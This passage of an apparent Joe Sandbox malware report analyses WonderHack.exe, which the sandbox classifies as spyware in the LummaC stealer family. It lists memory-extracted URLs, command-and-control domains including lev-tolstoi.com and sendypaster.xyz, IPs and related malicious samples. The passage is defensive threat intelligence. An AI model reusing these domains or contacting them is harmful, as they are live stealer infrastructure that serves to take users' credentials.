                                                                                            high
                                                                                            https://www.google.comWonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://lev-tolstoi.com/sYWonderHack.exe, 00000002.00000003.2532389602.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2527201915.0000000000F69000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2532196517.0000000000F51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiWonderHack.exe, 00000002.00000003.2479583191.00000000032E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://lev-tolstoi.com/sHWonderHack.exe, 00000002.00000003.2477331770.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2477650404.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453432872.00000000032ED000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453505070.00000000032ED000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453622723.00000000032EE000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453716881.00000000032EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englWonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://lev-tolstoi.com/iWonderHack.exe, 00000002.00000002.2585120871.0000000000F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://s.ytimg.com;WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://community.fastly.stPWonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://community.fastly.steamstatic.com/WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://steam.tv/WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://store.steampowered_WonderHack.exe, 00000002.00000002.2585120871.0000000000EAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://lev-tolstoi.com/WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000002.2585120871.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2573454494.0000000000F4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://store.steampowered.com/privacy_agreement/WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://lev-tolstoi.com/api6MWonderHack.exe, 00000002.00000003.2407396885.0000000000EED000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EDC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://store.steampowered.com/points/shop/WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://ocsp.rootca1.amazontrust.com0:WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016WonderHack.exe, 00000002.00000003.2431470081.0000000003383000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431593063.0000000003337000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453477056.0000000003337000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453259214.0000000003337000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://sketchfab.comWonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.ecosia.org/newtab/WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://lv.queniujq.cnWonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://steamcommunity.com/profiles/76561199724331900/inventory/WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brWonderHack.exe, 00000002.00000003.2479252822.0000000003400000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.youtube.com/WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://store.steampowered.com/privacy_agreement/WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://support.microsofWonderHack.exe, 00000002.00000003.2431470081.0000000003385000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/globalv2.WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.google.com/recaptcha/WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://checkout.steampowered.com/WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesWonderHack.exe, 00000002.00000003.2431593063.0000000003312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://store.steampowered.com/;WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://store.steampowered.com/about/WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://steamcommunity.com/my/wishlist/WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://help.steampowered.com/en/WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://steamcommunity.com/market/WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://store.steampowered.com/news/WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=eWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://store.steampowered.com/subscriber_agreement/WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2430172119.0000000000F61000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://steambroadcast.akamaized.nWonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WonderHack.exe, 00000002.00000003.2431470081.0000000003383000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431593063.0000000003337000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453477056.0000000003337000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453259214.0000000003337000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://recaptcha.net/recaptcha/;WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://steamcommunity.com/discussions/WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/HUWonderHack.exe, 00000002.00000002.2585120871.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://lev-tolstoi.com/apitWonderHack.exe, 00000002.00000003.2573579275.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000002.2585120871.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2545441913.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2573454494.0000000000F4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://store.steampowered.com/stats/WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://medal.tvWonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://broadcast.st.dl.eccdnx.comWonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://store.steampowered.com/steam_refunds/WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              http://x1.c.lencr.org/0WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                http://x1.i.lencr.org/0WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallWonderHack.exe, 00000002.00000003.2431593063.0000000003312000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchWonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=eWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              https://steamcommunity.com/workshop/WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                https://login.steampowered.com/WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                  104.21.66.86
                                                                                                                                                                                                                                                  lev-tolstoi.comUnited States
                                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                  193.143.1.9
                                                                                                                                                                                                                                                  sendypaster.xyzunknown
                                                                                                                                                                                                                                                  57271BITWEB-ASRUtrue
                                                                                                                                                                                                                                                  23.55.153.106
                                                                                                                                                                                                                                                  steamcommunity.comUnited States
                                                                                                                                                                                                                                                  20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                  Analysis ID:1579560
                                                                                                                                                                                                                                                  Start date and time:2024-12-23 00:47:07 +01:00
                                                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                  Overall analysis duration:0h 5m 33s
                                                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                  Number of analysed new started processes analysed:7
                                                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                                                  Sample name:WonderHack.exe
                                                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@4/1@11/3
                                                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                                                  • Successful, ratio: 50%
                                                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                                                  • Successful, ratio: 99%
                                                                                                                                                                                                                                                  • Number of executed functions: 19
                                                                                                                                                                                                                                                  • Number of non-executed functions: 49
                                                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63, 4.245.163.56
                                                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                  • Execution Graph export aborted for target WonderHack.exe, PID 3696 because there are no executed function
                                                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                                                                  18:48:01API Interceptor12x Sleep call for process: WonderHack.exe modified
                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                  104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                  • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                                                                                  193.143.1.9Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    23.55.153.106Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                          8ZVMneG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                            file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                                              ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      zq6a1iqg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                        lev-tolstoi.comLauncher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        8ZVMneG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                                                        Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                                                        CompleteStudio.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                        • 104.21.66.86
